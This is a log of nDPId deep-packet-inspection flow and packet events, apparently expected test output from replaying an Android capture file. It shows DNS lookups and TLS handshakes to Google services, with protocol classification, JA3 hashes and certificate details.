00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="}
00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"}
00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"}
00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="}
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
